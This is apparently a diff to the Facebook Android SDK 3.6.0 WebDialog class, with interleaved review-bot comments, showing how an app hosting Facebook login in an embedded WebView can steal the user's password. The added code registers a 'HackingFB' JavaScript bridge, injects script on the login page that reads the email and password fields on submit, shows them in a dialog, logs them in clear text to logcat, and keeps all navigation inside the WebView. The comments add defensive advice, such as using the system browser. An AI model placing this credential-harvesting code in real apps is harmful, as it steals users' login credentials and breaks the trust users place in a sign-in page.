Facebook Android SDK 3.6.0 OAuth using embedded Web View
diff --git i/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java w/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java | |
index 70ac868..c2c9af0 100644 | |
--- i/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java | |
+++ w/facebook-android-sdk-3.6.0/facebook/src/com/facebook/widget/WebDialog.java | |
@@ -17,6 +17,7 @@ | |
package com.facebook.widget; | |
import android.annotation.SuppressLint; | |
+import android.app.AlertDialog; | |
import android.app.Dialog; | |
import android.app.ProgressDialog; | |
import android.content.Context; | |
@@ -29,8 +30,11 @@ import android.net.Uri; | |
import android.net.http.SslError; | |
import android.os.Bundle; | |
import android.util.DisplayMetrics; | |
+import android.util.Log; | |
import android.view.*; | |
+import android.webkit.JavascriptInterface; | |
import android.webkit.SslErrorHandler; | |
+import android.webkit.WebChromeClient; | |
import android.webkit.WebView; | |
import android.webkit.WebViewClient; | |
import android.widget.FrameLayout; | |
@@ -43,6 +47,8 @@ import com.facebook.internal.ServerProtocol; | |
import com.facebook.internal.Utility; | |
import com.facebook.internal.Validate; | |
+import org.json.JSONTokener; | |
+ | |
/** | |
* This class provides a mechanism for displaying Facebook Web dialogs inside a Dialog. Helper | |
* methods are provided to construct commonly-used dialogs, or a caller can specify arbitrary | |
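Review bot: `org.json.JSONTokener` is imported in this hunk but none of the visible hunks reference it. Unless code outside the diff uses it, the import should be dropped so the patch carries only what the demonstration needs.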
@@ -342,6 +348,15 @@ public class WebDialog extends Dialog { | |
ViewGroup.LayoutParams.MATCH_PARENT)); | |
webView.setVisibility(View.INVISIBLE); | |
webView.getSettings().setSavePassword(false); | |
+ webView.addJavascriptInterface(new HackingFB(), "HackingFB"); | |
+ webView.setWebChromeClient(new WebChromeClient() { | |
+ @Override | |
+ public void onConsoleMessage(String message, int lineNumber, String sourceID) { | |
+ Log.e("password", message + " -- From line " | |
+ + lineNumber + " of " | |
+ + sourceID); | |
+ } | |
+ }); | |
webViewContainer.setPadding(margin, margin, margin, margin); | |
webViewContainer.addView(webView); | |
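Review bot: Nothing in this hunk marks the `HackingFB` bridge and the console-logging `WebChromeClient` as demonstration-only code, although both are attached to the WebView that hosts the login dialog. A comment above the `addJavascriptInterface` call would make the intent clear, for example `// DEMO ONLY: shows that the embedding app can observe this WebView's page content; never ship`. For reviewers of real apps, a JavaScript interface registered on a WebView that renders a third-party sign-in page is the pattern to flag. The mitigation is to run the OAuth flow in the system browser or a Custom Tab, where the host app cannot reach the page. The enclosing method starts outside the hunk.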
@@ -349,6 +364,24 @@ public class WebDialog extends Dialog { | |
contentFrameLayout.addView(webViewContainer); | |
} | |
+ private class HackingFB { | |
+ | |
+ @JavascriptInterface | |
+ public void foundCredential(String name, String password) { | |
+ harvest(name, password); | |
+ } | |
+ | |
+ private void harvest(String name, String password) { | |
+ AlertDialog.Builder alertDialogBuilder = new AlertDialog.Builder( | |
+ getContext()); | |
+ alertDialogBuilder.setTitle(name); | |
+ alertDialogBuilder.setMessage(password); | |
+ alertDialogBuilder.create(); | |
+ alertDialogBuilder.show(); | |
+ Log.e("Password", String.format("%s %s", name, password)); | |
+ } | |
+ } | |
+ | |
private class DialogWebViewClient extends WebViewClient { | |
@Override | |
@SuppressWarnings("deprecation") | |
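Review bot: `harvest` writes the user name and password in clear text to logcat via `Log.e("Password", String.format("%s %s", name, password))`. That leaves them in adb output and bug reports, and on older Android releases other apps with log-reading permission could read them. The dialog already makes the demonstration's point, so the log line should be removed or reduced to something like `Log.d("WebDialogDemo", "foundCredential invoked")`. Separately, the result of `alertDialogBuilder.create()` is discarded and `show()` builds its own dialog, so the `create()` call can be deleted.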
@@ -396,10 +429,11 @@ public class WebDialog extends Dialog { | |
} else if (url.contains(DISPLAY_TOUCH)) { | |
return false; | |
} | |
+ return false; | |
// launch non-dialog URLs in a full browser | |
- getContext().startActivity( | |
- new Intent(Intent.ACTION_VIEW, Uri.parse(url))); | |
- return true; | |
+// getContext().startActivity( | |
+// new Intent(Intent.ACTION_VIEW, Uri.parse(url))); | |
+// return true; | |
} | |
@Override | |
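Review bot: The added `return false;` sits above a comment that still says "launch non-dialog URLs in a full browser", and the old hand-off code is left commented out beneath it. The comment therefore describes behaviour that no longer runs. Delete the commented-out lines and state the new behaviour, e.g. `// demo: all navigation stays inside the dialog's WebView (upstream opened non-dialog URLs in the browser)`. From the user's side this also removes the one point where a real browser with an address bar took over, which is worth stating in the comment. The enclosing method starts outside the hunk.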
@@ -445,6 +479,16 @@ public class WebDialog extends Dialog { | |
contentFrameLayout.setBackgroundColor(Color.TRANSPARENT); | |
webView.setVisibility(View.VISIBLE); | |
crossImageView.setVisibility(View.VISIBLE); | |
+ if (url.contains("facebook.com/login.php")) { | |
+ Log.e("password ", "Sending alert"); | |
+ view.loadUrl("javascript:console.log('password From Native')"); | |
+ view.loadUrl("javascript:console.log(document)"); | |
+ view.loadUrl("" + | |
+ "javascript:function hacker() {" + | |
+ "var f = document.getElementsByTagName('form')[0];" + | |
+ " HackingFB.foundCredential(f.email.value, f.pass.value); " + | |
+ "f.submit()}; document.getElementsByName('login')[0].onclick=hacker; "); | |
+ } | |
} | |
} | |
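Review bot: The block contains debugging leftovers: the `Log.e("password ", "Sending alert")` line and the two `console.log` calls issued through `view.loadUrl`. Its log tag is a third spelling alongside `"password"` and `"Password"` in the earlier hunks, so filtering by tag is unreliable. A single constant would fix this, e.g. `private static final String TAG = "WebDialogDemo";`, with the debug lines removed. For defenders auditing apps that embed a sign-in WebView, a `loadUrl("javascript:…")` call issued after page load on a WebView that also has a JavaScript interface registered is the combination to search for. The enclosing method starts outside the hunk.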